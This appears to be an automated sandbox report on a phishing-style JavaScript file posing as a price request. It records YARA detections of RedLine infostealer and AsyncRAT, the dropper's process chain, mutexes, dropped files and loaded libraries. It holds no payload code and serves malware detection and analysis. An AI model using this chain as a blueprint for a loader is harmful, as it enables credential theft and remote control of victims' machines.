                        Source: Yara match | File source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR

                        System Summary

                        Source: 4.2.NaE.exe.35083c0.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.2.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 12.2.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 8.0.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 10.2.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 3.3.wscript.exe.27d83495000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 12.0.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 3.2.wscript.exe.27d83f5a630.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 4.0.NaE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 4.2.NaE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 3.3.wscript.exe.27d83495000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 10.0.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000004.00000002.1459366756.0000000000793000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: 00000008.00000002.2645719105.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                        Source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe, type: DROPPED | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe, type: DROPPED | Matched rule: Detects RedLine infostealer Author: ditekSHen
                        Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
                        Source: C:\Windows\System32\wscript.exe | COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
                        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00408C60
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_0040DC11
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00407C3F
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00418CCC
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00406CA0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_004028B0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_0041A4BE
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00418244
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00401650
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00402F20
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_004193C4
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00418788
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00402F89
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_00402B90
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_004073A0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_02211020
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: 4_2_02211030
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe | Code function: 8_2_02221020
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe | Code function: 8_2_02221030
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe | Code function: 10_2_00671020
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe | Code function: 10_2_00671030
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe | Code function: 12_2_02221020
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe | Code function: 12_2_02221030
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Code function: String function: 0040E1D8 appears 44 times
                        Source: 4.2.NaE.exe.35083c0.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.2.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 12.2.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 8.0.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 10.2.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 3.3.wscript.exe.27d83495000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 12.0.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 3.2.wscript.exe.27d83f5a630.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.0.NaE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.2.NaE.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 3.3.wscript.exe.27d83495000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 10.0.audio.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000004.00000002.1459366756.0000000000793000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 00000008.00000002.2645719105.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                        Source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe, type: DROPPED | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe, type: DROPPED | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3485f90.5.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.3466478.7.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: 4.2.NaE.exe.50c0000.9.raw.unpack, aojoPCkCOYi3rvl9Ad.cs | Cryptographic APIs: 'CreateDecryptor'
                        Source: wscript.exe, 00000000.00000002.1400375139.0000015E7EC20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;.VBp9
                        Source: classification engine | Classification label: mal100.troj.evad.winJS@15/8@4/3
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\wp[1].js
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\audio.exe | Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\IDWYPJ.js
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Command line argument: 08A | 4_2_00413780
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Price request N#U00b0DEM23000199.js | Virustotal: Detection: 32%
Source: Price request N#U00b0DEM23000199.js | ReversingLabs: Detection: 15%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\NaE.exe "C:\Users\user\AppData\Local\Temp\NaE.exe"
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\NaE.exe "C:\Users\user\AppData\Local\Temp\NaE.exe"
Source: C:\Users\user\AppData\Local\Temp\NaE.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wpdshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
